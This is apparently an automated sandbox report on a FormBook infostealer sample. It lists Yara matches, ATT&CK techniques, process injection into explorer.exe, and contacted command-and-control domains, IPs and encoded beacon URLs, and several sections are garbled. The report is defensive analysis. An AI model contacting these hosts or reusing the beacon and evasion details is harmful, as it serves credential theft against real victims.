Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Sources: the same thirteen Yara match sources (eight memory dumps and five unpacked PE files) listed under Stealing of Sensitive Information above.

MITRE ATT&CK Matrix

Techniques per tactic; the bracketed digits are the report's matched-signature counts as extracted.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Shared Modules [1], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Privilege Escalation: Process Injection [612], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [31], Process Injection [612], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [4], Software Packing [13]
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Security Software Discovery [221], Process Discovery [2], Virtualization/Sandbox Evasion [31], Remote System Discovery [1], System Information Discovery [112], System Owner/User Discovery, Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [1], Ingress Tool Transfer [3], Non-Application Layer Protocol [3], Application Layer Protocol [13], Fallback Channels, Multiband Communication, Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 433343 | Sample: UOMp9cDcqZ | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100

Sample-level nodes: www.zgcbw.net, clientconfig.passport.net, www.trendbold.com; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

Process tree and per-node findings recovered from the graph:

• UOMp9cDcqZ.exe (started): dropped C:\Users\user\AppData\...\UOMp9cDcqZ.exe.log (ASCII); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  • UOMp9cDcqZ.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected): cleanxcare.com 78.31.67.91, 49729, 80 (MYLOC-ASIPBackboneofmyLocmanagedITAGDE, Germany); www.hazard-protection.com 148.59.128.71, 49731, 80 (GREENHOUSE-WYUS, Canada); 7 other IPs or domains; System process connects to network (likely due to code injection or exploit)
      • colorcpl.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)
      • autochk.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
UOMp9cDcqZ.exe | 16% | Virustotal | -
UOMp9cDcqZ.exe | 26% | Metadefender | -
UOMp9cDcqZ.exe | 50% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
UOMp9cDcqZ.exe | 100% | Joe Sandbox ML | -

            Dropped Files

            No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.0.UOMp9cDcqZ.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.UOMp9cDcqZ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
www.dmgt4m2g8y2uh.net | 0% | Virustotal | -
www.hazard-protection.com | 2% | Virustotal | -
www.yunlimall.com | 1% | Virustotal | -
thesoulrevitalist.com | 1% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.sandoll.co.krN.TTFv | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cr | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp// | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.founder.c | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.thesoulrevitalist.com/p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP | 0% | Avira URL Cloud | safe
http://www.dmgt4m2g8y2uh.net/p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/liquI | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
www.adultpeace.com/p2io/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/4 | 0% | URL Reputation | safe
http://www.hazard-protection.com/p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/& | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.fontbureau.comuev | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sajatypeworks.coms | 0% | Avira URL Cloud | safe
http://www.yunlimall.com/p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP | 0% | Avira URL Cloud | safe
http://www.tiro.comn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn. | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/z | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.sajatypeworks.coma-d | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/MI | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.dmgt4m2g8y2uh.net | 103.120.12.113 | true | true | - | unknown
www.hazard-protection.com | 148.59.128.71 | true | true | - | unknown
www.yunlimall.com | 142.111.47.2 | true | true | - | unknown
thesoulrevitalist.com | 34.102.136.180 | true | false | - | unknown
cleanxcare.com | 78.31.67.91 | true | true | - | unknown
www.newmopeds.com | 52.58.78.16 | true | true | - | unknown
www.trendbold.com | 64.190.62.111 | true | false | - | unknown
www.thesoulrevitalist.com | unknown | unknown | true | - | unknown
www.jonathan-mandt.com | unknown | unknown | true | - | unknown
www.cleanxcare.com | unknown | unknown | true | - | unknown
clientconfig.passport.net | unknown | unknown | true | - | unknown
www.zgcbw.net | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.thesoulrevitalist.com/p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP | false | Avira URL Cloud: safe | unknown
http://www.dmgt4m2g8y2uh.net/p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP | true | Avira URL Cloud: safe | unknown
www.adultpeace.com/p2io/ | true | URL Reputation: safe | low
http://www.hazard-protection.com/p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP | true | Avira URL Cloud: safe | unknown
http://www.yunlimall.com/p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP | true | Avira URL Cloud: safe | unknown
http://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.krN.TTFv | UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cr | UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp// | UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.founder.c | UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/liquI | UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersU | UOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmp | false | - | high
http://www.sajatypeworks.com | UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/4 | UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | UOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/& | UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | UOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.comuev | UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | - | high
http://www.sajatypeworks.coms | UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comn | UOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                                http://www.founder.com.cn/cn/UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn.UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/zUOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnUOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlUOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.commUOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sajatypeworks.coma-dUOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers8UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/MIUOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown

                                                      Contacted IPs


                                                      Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 52.58.78.16 | www.newmopeds.com | United States | 16509 | AMAZON-02US | true |
| 142.111.47.2 | www.yunlimall.com | United States | 18779 | EGIHOSTINGUS | true |
| 103.120.12.113 | www.dmgt4m2g8y2uh.net | Philippines | 17941 | BIT-ISLEEquinixJpapanEnterpriseKKJP | true |
| 34.102.136.180 | thesoulrevitalist.com | United States | 15169 | GOOGLEUS | false |
| 148.59.128.71 | www.hazard-protection.com | Canada | 33561 | GREENHOUSE-WYUS | true |
| 78.31.67.91 | cleanxcare.com | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true |

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433343
Start date: 11.06.2021
Start time: 16:55:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: UOMp9cDcqZ (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/1@10/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 15.5% (good quality ratio 13.8%)
• Quality average: 71.9%
• Quality standard deviation: 32.1%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 93.184.220.29, 88.221.62.148, 92.123.150.225, 40.88.32.150, 20.82.210.154, 204.79.197.200, 13.107.21.200, 104.43.193.48, 168.61.161.212, 92.122.145.220, 184.30.20.56, 2.20.142.210, 2.20.142.209, 20.50.102.62, 92.122.213.194, 92.122.213.247, 20.54.26.129, 20.82.209.183
                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 16:56:27 | API Interceptor | 1x Sleep call for process: UOMp9cDcqZ.exe modified |

                                                      Joe Sandbox View / Context

                                                      IPs


                                                      Domains


                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      AMAZON-02USOrderKLB210568.exeGet hashmaliciousBrowse
                                                      • 34.215.126.147
                                                      q7jxy6gZMb.exeGet hashmaliciousBrowse
                                                      • 104.192.141.1
                                                      b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exeGet hashmaliciousBrowse
                                                      • 52.219.158.14
                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                      • 52.17.153.103
                                                      8BDBD0yy0q.apkGet hashmaliciousBrowse
                                                      • 13.224.195.88
                                                      ehDnx4Ke5d.exeGet hashmaliciousBrowse
                                                      • 3.22.15.135
                                                      KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                      • 3.34.12.41
                                                      c71fd2gJus.exeGet hashmaliciousBrowse
                                                      • 52.219.64.3
                                                      XQehPgTn35.exeGet hashmaliciousBrowse
                                                      • 3.136.65.236
                                                      E1a92ARmPw.exeGet hashmaliciousBrowse
                                                      • 35.157.179.180
                                                      crt9O3URua.exeGet hashmaliciousBrowse
                                                      • 35.157.179.180
E1a92ARmPw.exe (malicious) • 52.218.105.219
DNPr7t0GMY.exe (malicious) • 13.59.53.244
lTAPQJikGw.exe (malicious) • 99.83.154.118
SKlGhwkzTi.exe (malicious) • 44.227.65.245
SecuriteInfo.com.Trojan.Packed2.43183.29557.exe (malicious) • 13.59.53.244
Letter 1019.xlsx (malicious) • 18.140.1.169
#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM (malicious) • 143.204.98.37
Proforma Invoice and Bank swift-REG.PI-0086547654.exe (malicious) • 75.2.26.18
U03c2doc.exe (malicious) • 108.128.238.226

EGIHOSTINGUS
DNPr7t0GMY.exe (malicious) • 142.111.47.2
Letter 09JUN 2021.xlsx (malicious) • 142.111.47.2
lLJGwAgWDh.exe (malicious) • 104.252.75.149
Invoice number FV0062022020.exe (malicious) • 104.164.109.43
tzeEeC2CBA.exe (malicious) • 142.111.47.2
RFQ.exe (malicious) • 136.0.84.126
ye4nYRzxJa.exe (malicious) • 104.252.121.237
U4JZ8cQqvU.exe (malicious) • 142.111.47.2
IsIMH5zplo.exe (malicious) • 142.111.47.2
